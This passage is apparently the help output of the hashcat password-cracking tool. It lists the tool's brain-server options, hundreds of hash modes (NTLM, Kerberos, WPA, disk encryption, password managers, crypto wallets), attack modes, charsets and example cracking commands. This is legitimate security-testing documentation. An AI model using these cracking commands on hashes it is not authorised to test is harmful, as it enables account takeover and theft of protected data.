     --brain-password           | Str  | Brain server authentication password                 | --brain-password=bZfhCvGUSjRq
     --brain-session            | Hex  | Overrides automatically calculated brain session     | --brain-session=0x2ae611db
     --brain-session-whitelist  | Hex  | Allow given sessions only, separated with commas     | --brain-session-whitelist=0x2ae611db
 
- [ Hash modes ] -
 
      # | Name                                                | Category
  ======+=====================================================+======================================
    900 | MD4                                                 | Raw Hash
      0 | MD5                                                 | Raw Hash
    100 | SHA1                                                | Raw Hash
   1300 | SHA2-224                                            | Raw Hash
   1400 | SHA2-256                                            | Raw Hash
  10800 | SHA2-384                                            | Raw Hash
   1700 | SHA2-512                                            | Raw Hash
  17300 | SHA3-224                                            | Raw Hash
  17400 | SHA3-256                                            | Raw Hash
  17500 | SHA3-384                                            | Raw Hash
  17600 | SHA3-512                                            | Raw Hash
   6000 | RIPEMD-160                                          | Raw Hash
    600 | BLAKE2b-512                                         | Raw Hash
  11700 | GOST R 34.11-2012 (Streebog) 256-bit, big-endian    | Raw Hash
  11800 | GOST R 34.11-2012 (Streebog) 512-bit, big-endian    | Raw Hash
   6900 | GOST R 34.11-94                                     | Raw Hash
   5100 | Half MD5                                            | Raw Hash
  17700 | Keccak-224                                          | Raw Hash
  17800 | Keccak-256                                          | Raw Hash
  17900 | Keccak-384                                          | Raw Hash
  18000 | Keccak-512                                          | Raw Hash
   6100 | Whirlpool                                           | Raw Hash
  10100 | SipHash                                             | Raw Hash
     70 | md5(utf16le($pass))                                 | Raw Hash
    170 | sha1(utf16le($pass))                                | Raw Hash
   1470 | sha256(utf16le($pass))                              | Raw Hash
  10870 | sha384(utf16le($pass))                              | Raw Hash
   1770 | sha512(utf16le($pass))                              | Raw Hash
     10 | md5($pass.$salt)                                    | Raw Hash, Salted and/or Iterated
     20 | md5($salt.$pass)                                    | Raw Hash, Salted and/or Iterated
   3800 | md5($salt.$pass.$salt)                              | Raw Hash, Salted and/or Iterated
   3710 | md5($salt.md5($pass))                               | Raw Hash, Salted and/or Iterated
   4110 | md5($salt.md5($pass.$salt))                         | Raw Hash, Salted and/or Iterated
   4010 | md5($salt.md5($salt.$pass))                         | Raw Hash, Salted and/or Iterated
  21300 | md5($salt.sha1($salt.$pass))                        | Raw Hash, Salted and/or Iterated
     40 | md5($salt.utf16le($pass))                           | Raw Hash, Salted and/or Iterated
   2600 | md5(md5($pass))                                     | Raw Hash, Salted and/or Iterated
   3910 | md5(md5($pass).md5($salt))                          | Raw Hash, Salted and/or Iterated
   3500 | md5(md5(md5($pass)))                                | Raw Hash, Salted and/or Iterated
   4400 | md5(sha1($pass))                                    | Raw Hash, Salted and/or Iterated
  20900 | md5(sha1($pass).md5($pass).sha1($pass))             | Raw Hash, Salted and/or Iterated
  21200 | md5(sha1($salt).md5($pass))                         | Raw Hash, Salted and/or Iterated
   4300 | md5(strtoupper(md5($pass)))                         | Raw Hash, Salted and/or Iterated
     30 | md5(utf16le($pass).$salt)                           | Raw Hash, Salted and/or Iterated
    110 | sha1($pass.$salt)                                   | Raw Hash, Salted and/or Iterated
    120 | sha1($salt.$pass)                                   | Raw Hash, Salted and/or Iterated
   4900 | sha1($salt.$pass.$salt)                             | Raw Hash, Salted and/or Iterated
   4520 | sha1($salt.sha1($pass))                             | Raw Hash, Salted and/or Iterated
  24300 | sha1($salt.sha1($pass.$salt))                       | Raw Hash, Salted and/or Iterated
    140 | sha1($salt.utf16le($pass))                          | Raw Hash, Salted and/or Iterated
  19300 | sha1($salt1.$pass.$salt2)                           | Raw Hash, Salted and/or Iterated
  14400 | sha1(CX)                                            | Raw Hash, Salted and/or Iterated
   4700 | sha1(md5($pass))                                    | Raw Hash, Salted and/or Iterated
   4710 | sha1(md5($pass).$salt)                              | Raw Hash, Salted and/or Iterated
  21100 | sha1(md5($pass.$salt))                              | Raw Hash, Salted and/or Iterated
  18500 | sha1(md5(md5($pass)))                               | Raw Hash, Salted and/or Iterated
   4500 | sha1(sha1($pass))                                   | Raw Hash, Salted and/or Iterated
   4510 | sha1(sha1($pass).$salt)                             | Raw Hash, Salted and/or Iterated
   5000 | sha1(sha1($salt.$pass.$salt))                       | Raw Hash, Salted and/or Iterated
    130 | sha1(utf16le($pass).$salt)                          | Raw Hash, Salted and/or Iterated
   1410 | sha256($pass.$salt)                                 | Raw Hash, Salted and/or Iterated
   1420 | sha256($salt.$pass)                                 | Raw Hash, Salted and/or Iterated
  22300 | sha256($salt.$pass.$salt)                           | Raw Hash, Salted and/or Iterated
  20720 | sha256($salt.sha256($pass))                         | Raw Hash, Salted and/or Iterated
   1440 | sha256($salt.utf16le($pass))                        | Raw Hash, Salted and/or Iterated
  20800 | sha256(md5($pass))                                  | Raw Hash, Salted and/or Iterated
  20710 | sha256(sha256($pass).$salt)                         | Raw Hash, Salted and/or Iterated
  21400 | sha256(sha256_bin($pass))                           | Raw Hash, Salted and/or Iterated
   1430 | sha256(utf16le($pass).$salt)                        | Raw Hash, Salted and/or Iterated
  10810 | sha384($pass.$salt)                                 | Raw Hash, Salted and/or Iterated
  10820 | sha384($salt.$pass)                                 | Raw Hash, Salted and/or Iterated
  10840 | sha384($salt.utf16le($pass))                        | Raw Hash, Salted and/or Iterated
  10830 | sha384(utf16le($pass).$salt)                        | Raw Hash, Salted and/or Iterated
   1710 | sha512($pass.$salt)                                 | Raw Hash, Salted and/or Iterated
   1720 | sha512($salt.$pass)                                 | Raw Hash, Salted and/or Iterated
   1740 | sha512($salt.utf16le($pass))                        | Raw Hash, Salted and/or Iterated
   1730 | sha512(utf16le($pass).$salt)                        | Raw Hash, Salted and/or Iterated
     50 | HMAC-MD5 (key = $pass)                              | Raw Hash, Authenticated
     60 | HMAC-MD5 (key = $salt)                              | Raw Hash, Authenticated
    150 | HMAC-SHA1 (key = $pass)                             | Raw Hash, Authenticated
    160 | HMAC-SHA1 (key = $salt)                             | Raw Hash, Authenticated
   1450 | HMAC-SHA256 (key = $pass)                           | Raw Hash, Authenticated
   1460 | HMAC-SHA256 (key = $salt)                           | Raw Hash, Authenticated
   1750 | HMAC-SHA512 (key = $pass)                           | Raw Hash, Authenticated
   1760 | HMAC-SHA512 (key = $salt)                           | Raw Hash, Authenticated
  11750 | HMAC-Streebog-256 (key = $pass), big-endian         | Raw Hash, Authenticated
  11760 | HMAC-Streebog-256 (key = $salt), big-endian         | Raw Hash, Authenticated
  11850 | HMAC-Streebog-512 (key = $pass), big-endian         | Raw Hash, Authenticated
  11860 | HMAC-Streebog-512 (key = $salt), big-endian         | Raw Hash, Authenticated
  11500 | CRC32                                               | Raw Checksum
  18700 | Java Object hashCode()                              | Raw Checksum
  25700 | MurmurHash                                          | Raw Checksum
  14100 | 3DES (PT = $salt, key = $pass)                      | Raw Cipher, Known-Plaintext attack
  14000 | DES (PT = $salt, key = $pass)                       | Raw Cipher, Known-Plaintext attack
  26401 | AES-128-ECB NOKDF (PT = $salt, key = $pass)         | Raw Cipher, Known-Plaintext attack
  26402 | AES-192-ECB NOKDF (PT = $salt, key = $pass)         | Raw Cipher, Known-Plaintext attack
  26403 | AES-256-ECB NOKDF (PT = $salt, key = $pass)         | Raw Cipher, Known-Plaintext attack
  15400 | ChaCha20                                            | Raw Cipher, Known-Plaintext attack
  14500 | Linux Kernel Crypto API (2.4)                       | Raw Cipher, Known-Plaintext attack
  14900 | Skip32 (PT = $salt, key = $pass)                    | Raw Cipher, Known-Plaintext attack
  11900 | PBKDF2-HMAC-MD5                                     | Generic KDF
  12000 | PBKDF2-HMAC-SHA1                                    | Generic KDF
  10900 | PBKDF2-HMAC-SHA256                                  | Generic KDF
  12100 | PBKDF2-HMAC-SHA512                                  | Generic KDF
   8900 | scrypt                                              | Generic KDF
    400 | phpass                                              | Generic KDF
  16100 | TACACS+                                             | Network Protocols
  11400 | SIP digest authentication (MD5)                     | Network Protocols
   5300 | IKE-PSK MD5                                         | Network Protocols
   5400 | IKE-PSK SHA1                                        | Network Protocols
  25100 | SNMPv3 HMAC-MD5-96                                  | Network Protocols
  25000 | SNMPv3 HMAC-MD5-96/HMAC-SHA1-96                     | Network Protocols
  25200 | SNMPv3 HMAC-SHA1-96                                 | Network Protocols
  26700 | SNMPv3 HMAC-SHA224-128                              | Network Protocols
  26800 | SNMPv3 HMAC-SHA256-192                              | Network Protocols
  26900 | SNMPv3 HMAC-SHA384-256                              | Network Protocols
  27300 | SNMPv3 HMAC-SHA512-384                              | Network Protocols
   2500 | WPA-EAPOL-PBKDF2                                    | Network Protocols
   2501 | WPA-EAPOL-PMK                                       | Network Protocols
  22000 | WPA-PBKDF2-PMKID+EAPOL                              | Network Protocols
  22001 | WPA-PMK-PMKID+EAPOL                                 | Network Protocols
  16800 | WPA-PMKID-PBKDF2                                    | Network Protocols
  16801 | WPA-PMKID-PMK                                       | Network Protocols
   7300 | IPMI2 RAKP HMAC-SHA1                                | Network Protocols
  10200 | CRAM-MD5                                            | Network Protocols
  16500 | JWT (JSON Web Token)                                | Network Protocols
  19600 | Kerberos 5, etype 17, TGS-REP                       | Network Protocols
  19800 | Kerberos 5, etype 17, Pre-Auth                      | Network Protocols
  19700 | Kerberos 5, etype 18, TGS-REP                       | Network Protocols
  19900 | Kerberos 5, etype 18, Pre-Auth                      | Network Protocols
   7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth               | Network Protocols
  13100 | Kerberos 5, etype 23, TGS-REP                       | Network Protocols
  18200 | Kerberos 5, etype 23, AS-REP                        | Network Protocols
   5500 | NetNTLMv1 / NetNTLMv1+ESS                           | Network Protocols
  27000 | NetNTLMv1 / NetNTLMv1+ESS (NT)                      | Network Protocols
   5600 | NetNTLMv2                                           | Network Protocols
  27100 | NetNTLMv2 (NT)                                      | Network Protocols
   4800 | iSCSI CHAP authentication, MD5(CHAP)                | Network Protocols
   8500 | RACF                                                | Operating System
   6300 | AIX {smd5}                                          | Operating System
   6700 | AIX {ssha1}                                         | Operating System
   6400 | AIX {ssha256}                                       | Operating System
   6500 | AIX {ssha512}                                       | Operating System
   3000 | LM                                                  | Operating System
  19000 | QNX /etc/shadow (MD5)                               | Operating System
  19100 | QNX /etc/shadow (SHA256)                            | Operating System
  19200 | QNX /etc/shadow (SHA512)                            | Operating System
  15300 | DPAPI masterkey file v1                             | Operating System
  15900 | DPAPI masterkey file v2                             | Operating System
   7200 | GRUB 2                                              | Operating System
  12800 | MS-AzureSync PBKDF2-HMAC-SHA256                     | Operating System
  12400 | BSDi Crypt, Extended DES                            | Operating System
   1000 | NTLM                                                | Operating System
   9900 | Radmin2                                             | Operating System
   5800 | Samsung Android Password/PIN                        | Operating System
  13800 | Windows Phone 8+ PIN/password                       | Operating System
   2410 | Cisco-ASA MD5                                       | Operating System
   9200 | Cisco-IOS $8$ (PBKDF2-SHA256)                       | Operating System
   9300 | Cisco-IOS $9$ (scrypt)                              | Operating System
   5700 | Cisco-IOS type 4 (SHA256)                           | Operating System
   2400 | Cisco-PIX MD5                                       | Operating System
   8100 | Citrix NetScaler (SHA1)                             | Operating System
  22200 | Citrix NetScaler (SHA512)                           | Operating System
   1100 | Domain Cached Credentials (DCC), MS Cache           | Operating System
   2100 | Domain Cached Credentials 2 (DCC2), MS Cache 2      | Operating System
   7000 | FortiGate (FortiOS)                                 | Operating System
  26300 | FortiGate256 (FortiOS256)                           | Operating System
    125 | ArubaOS                                             | Operating System
    501 | Juniper IVE                                         | Operating System
     22 | Juniper NetScreen/SSG (ScreenOS)                    | Operating System
  15100 | Juniper/NetBSD sha1crypt                            | Operating System
  26500 | iPhone passcode (UID key + System Keybag)           | Operating System
    122 | macOS v10.4, macOS v10.5, macOS v10.6               | Operating System
   1722 | macOS v10.7                                         | Operating System
   7100 | macOS v10.8+ (PBKDF2-SHA512)                        | Operating System
   3200 | bcrypt $2*$, Blowfish (Unix)                        | Operating System
    500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)           | Operating System
   1500 | descrypt, DES (Unix), Traditional DES               | Operating System
   7400 | sha256crypt $5$, SHA256 (Unix)                      | Operating System
   1800 | sha512crypt $6$, SHA512 (Unix)                      | Operating System
  24600 | SQLCipher                                           | Database Server
    131 | MSSQL (2000)                                        | Database Server
    132 | MSSQL (2005)                                        | Database Server
   1731 | MSSQL (2012, 2014)                                  | Database Server
  24100 | MongoDB ServerKey SCRAM-SHA-1                       | Database Server
  24200 | MongoDB ServerKey SCRAM-SHA-256                     | Database Server
     12 | PostgreSQL                                          | Database Server
  11100 | PostgreSQL CRAM (MD5)                               | Database Server
   3100 | Oracle H: Type (Oracle 7+)                          | Database Server
    112 | Oracle S: Type (Oracle 11+)                         | Database Server
  12300 | Oracle T: Type (Oracle 12+)                         | Database Server
   7401 | MySQL $A$ (sha256crypt)                             | Database Server
  11200 | MySQL CRAM (SHA1)                                   | Database Server
    200 | MySQL323                                            | Database Server
    300 | MySQL4.1/MySQL5                                     | Database Server
   8000 | Sybase ASE                                          | Database Server
   8300 | DNSSEC (NSEC3)                                      | FTP, HTTP, SMTP, LDAP Server
  25900 | KNX IP Secure - Device Authentication Code          | FTP, HTTP, SMTP, LDAP Server
  16400 | CRAM-MD5 Dovecot                                    | FTP, HTTP, SMTP, LDAP Server
   1411 | SSHA-256(Base64), LDAP {SSHA256}                    | FTP, HTTP, SMTP, LDAP Server
   1711 | SSHA-512(Base64), LDAP {SSHA512}                    | FTP, HTTP, SMTP, LDAP Server
  24900 | Dahua Authentication MD5                            | FTP, HTTP, SMTP, LDAP Server
  10901 | RedHat 389-DS LDAP (PBKDF2-HMAC-SHA256)             | FTP, HTTP, SMTP, LDAP Server
  15000 | FileZilla Server >= 0.9.55                          | FTP, HTTP, SMTP, LDAP Server
  12600 | ColdFusion 10+                                      | FTP, HTTP, SMTP, LDAP Server
   1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR)               | FTP, HTTP, SMTP, LDAP Server
    141 | Episerver 6.x < .NET 4                              | FTP, HTTP, SMTP, LDAP Server
   1441 | Episerver 6.x >= .NET 4                             | FTP, HTTP, SMTP, LDAP Server
   1421 | hMailServer                                         | FTP, HTTP, SMTP, LDAP Server
    101 | nsldap, SHA-1(Base64), Netscape LDAP SHA            | FTP, HTTP, SMTP, LDAP Server
    111 | nsldaps, SSHA-1(Base64), Netscape LDAP SSHA         | FTP, HTTP, SMTP, LDAP Server
   7700 | SAP CODVN B (BCODE)                                 | Enterprise Application Software (EAS)
   7701 | SAP CODVN B (BCODE) from RFC_READ_TABLE             | Enterprise Application Software (EAS)
   7800 | SAP CODVN F/G (PASSCODE)                            | Enterprise Application Software (EAS)
   7801 | SAP CODVN F/G (PASSCODE) from RFC_READ_TABLE        | Enterprise Application Software (EAS)
  10300 | SAP CODVN H (PWDSALTEDHASH) iSSHA-1                 | Enterprise Application Software (EAS)
    133 | PeopleSoft                                          | Enterprise Application Software (EAS)
  13500 | PeopleSoft PS_TOKEN                                 | Enterprise Application Software (EAS)
  21500 | SolarWinds Orion                                    | Enterprise Application Software (EAS)
  21501 | SolarWinds Orion v2                                 | Enterprise Application Software (EAS)
     24 | SolarWinds Serv-U                                   | Enterprise Application Software (EAS)
   8600 | Lotus Notes/Domino 5                                | Enterprise Application Software (EAS)
   8700 | Lotus Notes/Domino 6                                | Enterprise Application Software (EAS)
   9100 | Lotus Notes/Domino 8                                | Enterprise Application Software (EAS)
  26200 | OpenEdge Progress Encode                            | Enterprise Application Software (EAS)
  20600 | Oracle Transportation Management (SHA256)           | Enterprise Application Software (EAS)
   4711 | Huawei sha1(md5($pass).$salt)                       | Enterprise Application Software (EAS)
  20711 | AuthMe sha256                                       | Enterprise Application Software (EAS)
  22400 | AES Crypt (SHA256)                                  | Full-Disk Encryption (FDE)
  27400 | VMware VMX (PBKDF2-HMAC-SHA1 + AES-256-CBC)         | Full-Disk Encryption (FDE)
  14600 | LUKS                                                | Full-Disk Encryption (FDE)
  13711 | VeraCrypt RIPEMD160 + XTS 512 bit                   | Full-Disk Encryption (FDE)
  13712 | VeraCrypt RIPEMD160 + XTS 1024 bit                  | Full-Disk Encryption (FDE)
  13713 | VeraCrypt RIPEMD160 + XTS 1536 bit                  | Full-Disk Encryption (FDE)
  13741 | VeraCrypt RIPEMD160 + XTS 512 bit + boot-mode       | Full-Disk Encryption (FDE)
  13742 | VeraCrypt RIPEMD160 + XTS 1024 bit + boot-mode      | Full-Disk Encryption (FDE)
  13743 | VeraCrypt RIPEMD160 + XTS 1536 bit + boot-mode      | Full-Disk Encryption (FDE)
  13751 | VeraCrypt SHA256 + XTS 512 bit                      | Full-Disk Encryption (FDE)
  13752 | VeraCrypt SHA256 + XTS 1024 bit                     | Full-Disk Encryption (FDE)
  13753 | VeraCrypt SHA256 + XTS 1536 bit                     | Full-Disk Encryption (FDE)
  13761 | VeraCrypt SHA256 + XTS 512 bit + boot-mode          | Full-Disk Encryption (FDE)
  13762 | VeraCrypt SHA256 + XTS 1024 bit + boot-mode         | Full-Disk Encryption (FDE)
  13763 | VeraCrypt SHA256 + XTS 1536 bit + boot-mode         | Full-Disk Encryption (FDE)
  13721 | VeraCrypt SHA512 + XTS 512 bit                      | Full-Disk Encryption (FDE)
  13722 | VeraCrypt SHA512 + XTS 1024 bit                     | Full-Disk Encryption (FDE)
  13723 | VeraCrypt SHA512 + XTS 1536 bit                     | Full-Disk Encryption (FDE)
  13771 | VeraCrypt Streebog-512 + XTS 512 bit                | Full-Disk Encryption (FDE)
  13772 | VeraCrypt Streebog-512 + XTS 1024 bit               | Full-Disk Encryption (FDE)
  13773 | VeraCrypt Streebog-512 + XTS 1536 bit               | Full-Disk Encryption (FDE)
  13781 | VeraCrypt Streebog-512 + XTS 512 bit + boot-mode    | Full-Disk Encryption (FDE)
  13782 | VeraCrypt Streebog-512 + XTS 1024 bit + boot-mode   | Full-Disk Encryption (FDE)
  13783 | VeraCrypt Streebog-512 + XTS 1536 bit + boot-mode   | Full-Disk Encryption (FDE)
  13731 | VeraCrypt Whirlpool + XTS 512 bit                   | Full-Disk Encryption (FDE)
  13732 | VeraCrypt Whirlpool + XTS 1024 bit                  | Full-Disk Encryption (FDE)
  13733 | VeraCrypt Whirlpool + XTS 1536 bit                  | Full-Disk Encryption (FDE)
  23900 | BestCrypt v3 Volume Encryption                      | Full-Disk Encryption (FDE)
  16700 | FileVault 2                                         | Full-Disk Encryption (FDE)
  27500 | VirtualBox (PBKDF2-HMAC-SHA256 & AES-128-XTS)       | Full-Disk Encryption (FDE)
  27600 | VirtualBox (PBKDF2-HMAC-SHA256 & AES-256-XTS)       | Full-Disk Encryption (FDE)
  20011 | DiskCryptor SHA512 + XTS 512 bit                    | Full-Disk Encryption (FDE)
  20012 | DiskCryptor SHA512 + XTS 1024 bit                   | Full-Disk Encryption (FDE)
  20013 | DiskCryptor SHA512 + XTS 1536 bit                   | Full-Disk Encryption (FDE)
  22100 | BitLocker                                           | Full-Disk Encryption (FDE)
  12900 | Android FDE (Samsung DEK)                           | Full-Disk Encryption (FDE)
   8800 | Android FDE <= 4.3                                  | Full-Disk Encryption (FDE)
  18300 | Apple File System (APFS)                            | Full-Disk Encryption (FDE)
   6211 | TrueCrypt RIPEMD160 + XTS 512 bit                   | Full-Disk Encryption (FDE)
   6212 | TrueCrypt RIPEMD160 + XTS 1024 bit                  | Full-Disk Encryption (FDE)
   6213 | TrueCrypt RIPEMD160 + XTS 1536 bit                  | Full-Disk Encryption (FDE)
   6241 | TrueCrypt RIPEMD160 + XTS 512 bit + boot-mode       | Full-Disk Encryption (FDE)
   6242 | TrueCrypt RIPEMD160 + XTS 1024 bit + boot-mode      | Full-Disk Encryption (FDE)
   6243 | TrueCrypt RIPEMD160 + XTS 1536 bit + boot-mode      | Full-Disk Encryption (FDE)
   6221 | TrueCrypt SHA512 + XTS 512 bit                      | Full-Disk Encryption (FDE)
   6222 | TrueCrypt SHA512 + XTS 1024 bit                     | Full-Disk Encryption (FDE)
   6223 | TrueCrypt SHA512 + XTS 1536 bit                     | Full-Disk Encryption (FDE)
   6231 | TrueCrypt Whirlpool + XTS 512 bit                   | Full-Disk Encryption (FDE)
   6232 | TrueCrypt Whirlpool + XTS 1024 bit                  | Full-Disk Encryption (FDE)
   6233 | TrueCrypt Whirlpool + XTS 1536 bit                  | Full-Disk Encryption (FDE)
  12200 | eCryptfs                                            | Full-Disk Encryption (FDE)
  10400 | PDF 1.1 - 1.3 (Acrobat 2 - 4)                       | Documents
  10410 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #1          | Documents
  10420 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #2          | Documents
  10500 | PDF 1.4 - 1.6 (Acrobat 5 - 8)                       | Documents
  25400 | PDF 1.4 - 1.6 (Acrobat 5 - 8) - edit password       | Documents
  10600 | PDF 1.7 Level 3 (Acrobat 9)                         | Documents
  10700 | PDF 1.7 Level 8 (Acrobat 10 - 11)                   | Documents
   9400 | MS Office 2007                                      | Documents
   9500 | MS Office 2010                                      | Documents
   9600 | MS Office 2013                                      | Documents
  25300 | MS Office 2016 - SheetProtection                    | Documents
   9700 | MS Office <= 2003 $0/$1, MD5 + RC4                  | Documents
   9710 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #1     | Documents
   9720 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #2     | Documents
   9810 | MS Office <= 2003 $3, SHA1 + RC4, collider #1       | Documents
   9820 | MS Office <= 2003 $3, SHA1 + RC4, collider #2       | Documents
   9800 | MS Office <= 2003 $3/$4, SHA1 + RC4                 | Documents
  18400 | Open Document Format (ODF) 1.2 (SHA-256, AES)       | Documents
  18600 | Open Document Format (ODF) 1.1 (SHA-1, Blowfish)    | Documents
  16200 | Apple Secure Notes                                  | Documents
  23300 | Apple iWork                                         | Documents
   6600 | 1Password, agilekeychain                            | Password Managers
   8200 | 1Password, cloudkeychain                            | Password Managers
   9000 | Password Safe v2                                    | Password Managers
   5200 | Password Safe v3                                    | Password Managers
   6800 | LastPass + LastPass sniffed                         | Password Managers
  13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES)         | Password Managers
  23400 | Bitwarden                                           | Password Managers
  16900 | Ansible Vault                                       | Password Managers
  26000 | Mozilla key3.db                                     | Password Managers
  26100 | Mozilla key4.db                                     | Password Managers
  23100 | Apple Keychain                                      | Password Managers
  11600 | 7-Zip                                               | Archives
  12500 | RAR3-hp                                             | Archives
  23800 | RAR3-p (Compressed)                                 | Archives
  23700 | RAR3-p (Uncompressed)                               | Archives
  13000 | RAR5                                                | Archives
  17220 | PKZIP (Compressed Multi-File)                       | Archives
  17200 | PKZIP (Compressed)                                  | Archives
  17225 | PKZIP (Mixed Multi-File)                            | Archives
  17230 | PKZIP (Mixed Multi-File Checksum-Only)              | Archives
  17210 | PKZIP (Uncompressed)                                | Archives
  20500 | PKZIP Master Key                                    | Archives
  20510 | PKZIP Master Key (6 byte optimization)              | Archives
  23001 | SecureZIP AES-128                                   | Archives
  23002 | SecureZIP AES-192                                   | Archives
  23003 | SecureZIP AES-256                                   | Archives
  13600 | WinZip                                              | Archives
  18900 | Android Backup                                      | Archives
  24700 | Stuffit5                                            | Archives
  13200 | AxCrypt 1                                           | Archives
  13300 | AxCrypt 1 in-memory SHA1                            | Archives
  23500 | AxCrypt 2 AES-128                                   | Archives
  23600 | AxCrypt 2 AES-256                                   | Archives
  14700 | iTunes backup < 10.0                                | Archives
  14800 | iTunes backup >= 10.0                               | Archives
   8400 | WBB3 (Woltlab Burning Board)                        | Forums, CMS, E-Commerce
   2612 | PHPS                                                | Forums, CMS, E-Commerce
    121 | SMF (Simple Machines Forum) > v1.1                  | Forums, CMS, E-Commerce
   3711 | MediaWiki B type                                    | Forums, CMS, E-Commerce
   4521 | Redmine                                             | Forums, CMS, E-Commerce
  24800 | Umbraco HMAC-SHA1                                   | Forums, CMS, E-Commerce
     11 | Joomla < 2.5.18                                     | Forums, CMS, E-Commerce
  13900 | OpenCart                                            | Forums, CMS, E-Commerce
  11000 | PrestaShop                                          | Forums, CMS, E-Commerce
  16000 | Tripcode                                            | Forums, CMS, E-Commerce
   7900 | Drupal7                                             | Forums, CMS, E-Commerce
   4522 | PunBB                                               | Forums, CMS, E-Commerce
   2811 | MyBB 1.2+, IPB2+ (Invision Power Board)             | Forums, CMS, E-Commerce
   2611 | vBulletin < v3.8.5                                  | Forums, CMS, E-Commerce
   2711 | vBulletin >= v3.8.5                                 | Forums, CMS, E-Commerce
  25600 | bcrypt(md5($pass)) / bcryptmd5                      | Forums, CMS, E-Commerce
  25800 | bcrypt(sha1($pass)) / bcryptsha1                    | Forums, CMS, E-Commerce
     21 | osCommerce, xt:Commerce                             | Forums, CMS, E-Commerce
  18100 | TOTP (HMAC-SHA1)                                    | One-Time Passwords
   2000 | STDOUT                                              | Plaintext
  99999 | Plaintext                                           | Plaintext
  21600 | Web2py pbkdf2-sha512                                | Framework
  10000 | Django (PBKDF2-SHA256)                              | Framework
    124 | Django (SHA-1)                                      | Framework
  12001 | Atlassian (PBKDF2-HMAC-SHA1)                        | Framework
  19500 | Ruby on Rails Restful-Authentication                | Framework
  27200 | Ruby on Rails Restful Auth (one round, no sitekey)  | Framework
  20200 | Python passlib pbkdf2-sha512                        | Framework
  20300 | Python passlib pbkdf2-sha256                        | Framework
  20400 | Python passlib pbkdf2-sha1                          | Framework
  24410 | PKCS#8 Private Keys (PBKDF2-HMAC-SHA1 + 3DES/AES)   | Private Key
  24420 | PKCS#8 Private Keys (PBKDF2-HMAC-SHA256 + 3DES/AES) | Private Key
  15500 | JKS Java Key Store Private Keys (SHA1)              | Private Key
  22911 | RSA/DSA/EC/OpenSSH Private Keys ($0$)               | Private Key
  22921 | RSA/DSA/EC/OpenSSH Private Keys ($6$)               | Private Key
  22931 | RSA/DSA/EC/OpenSSH Private Keys ($1, $3$)           | Private Key
  22941 | RSA/DSA/EC/OpenSSH Private Keys ($4$)               | Private Key
  22951 | RSA/DSA/EC/OpenSSH Private Keys ($5$)               | Private Key
  23200 | XMPP SCRAM PBKDF2-SHA1                              | Instant Messaging Service
  22600 | Telegram Desktop < v2.1.14 (PBKDF2-HMAC-SHA1)       | Instant Messaging Service
  24500 | Telegram Desktop >= v2.1.14 (PBKDF2-HMAC-SHA512)    | Instant Messaging Service
  22301 | Telegram Mobile App Passcode (SHA256)               | Instant Messaging Service
     23 | Skype                                               | Instant Messaging Service
  26600 | MetaMask Wallet                                     | Cryptocurrency Wallet
  21000 | BitShares v0.x - sha512(sha512_bin(pass))           | Cryptocurrency Wallet
  11300 | Bitcoin/Litecoin wallet.dat                         | Cryptocurrency Wallet
  16600 | Electrum Wallet (Salt-Type 1-3)                     | Cryptocurrency Wallet
  21700 | Electrum Wallet (Salt-Type 4)                       | Cryptocurrency Wallet
  21800 | Electrum Wallet (Salt-Type 5)                       | Cryptocurrency Wallet
  12700 | Blockchain, My Wallet                               | Cryptocurrency Wallet
  15200 | Blockchain, My Wallet, V2                           | Cryptocurrency Wallet
  18800 | Blockchain, My Wallet, Second Password (SHA256)     | Cryptocurrency Wallet
  25500 | Stargazer Stellar Wallet XLM                        | Cryptocurrency Wallet
  16300 | Ethereum Pre-Sale Wallet, PBKDF2-HMAC-SHA256        | Cryptocurrency Wallet
  15600 | Ethereum Wallet, PBKDF2-HMAC-SHA256                 | Cryptocurrency Wallet
  15700 | Ethereum Wallet, SCRYPT                             | Cryptocurrency Wallet
  22500 | MultiBit Classic .key (MD5)                         | Cryptocurrency Wallet
  22700 | MultiBit HD (scrypt)                                | Cryptocurrency Wallet
 
- [ Brain Client Features ] -
 
  # | Features
 ===+========
  1 | Send hashed passwords
  2 | Send attack positions
  3 | Send hashed passwords and attack positions
 
- [ Outfile Formats ] -
 
  # | Format
 ===+========
  1 | hash[:salt]
  2 | plain
  3 | hex_plain
  4 | crack_pos
  5 | timestamp absolute
  6 | timestamp relative
 
- [ Rule Debugging Modes ] -
 
  # | Format
 ===+========
  1 | Finding-Rule
  2 | Original-Word
  3 | Original-Word:Finding-Rule
  4 | Original-Word:Finding-Rule:Processed-Word
 
- [ Attack Modes ] -
 
  # | Mode
 ===+======
  0 | Straight
  1 | Combination
  3 | Brute-force
  6 | Hybrid Wordlist + Mask
  7 | Hybrid Mask + Wordlist
  9 | Association
 
- [ Built-in Charsets ] -
 
  ? | Charset
 ===+=========
  l | abcdefghijklmnopqrstuvwxyz [a-z]
  u | ABCDEFGHIJKLMNOPQRSTUVWXYZ [A-Z]
  d | 0123456789                 [0-9]
  h | 0123456789abcdef           [0-9a-f]
  H | 0123456789ABCDEF           [0-9A-F]
  s |  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
  a | ?l?u?d?s
  b | 0x00 - 0xff
 
- [ OpenCL Device Types ] -
 
  # | Device Type
 ===+=============
  1 | CPU
  2 | GPU
  3 | FPGA, DSP, Co-Processor
 
- [ Workload Profiles ] -
 
  # | Performance | Runtime | Power Consumption | Desktop Impact
 ===+=============+=========+===================+=================
  1 | Low         |   2 ms  | Low               | Minimal
  2 | Default     |  12 ms  | Economic          | Noticeable
  3 | High        |  96 ms  | High              | Unresponsive
  4 | Nightmare   | 480 ms  | Insane            | Headless
 
- [ License ] -
 
  hashcat is licensed under the MIT license
  Copyright and license terms are listed in docs/license.txt
 
- [ Basic Examples ] -
 
  Attack-          | Hash- |
  Mode             | Type  | Example command
 ==================+=======+==================================================================
  Wordlist         | $P$   | hashcat -a 0 -m 400 example400.hash example.dict
  Wordlist + Rules | MD5   | hashcat -a 0 -m 0 example0.hash example.dict -r rules/best64.rule
  Brute-Force      | MD5   | hashcat -a 3 -m 0 example0.hash ?a?a?a?a?a?a
  Combinator       | MD5   | hashcat -a 1 -m 0 example0.hash example.dict example.dict
  Association      | $1$   | hashcat -a 9 -m 500 example500.hash 1word.dict -r rules/best64.rule
 
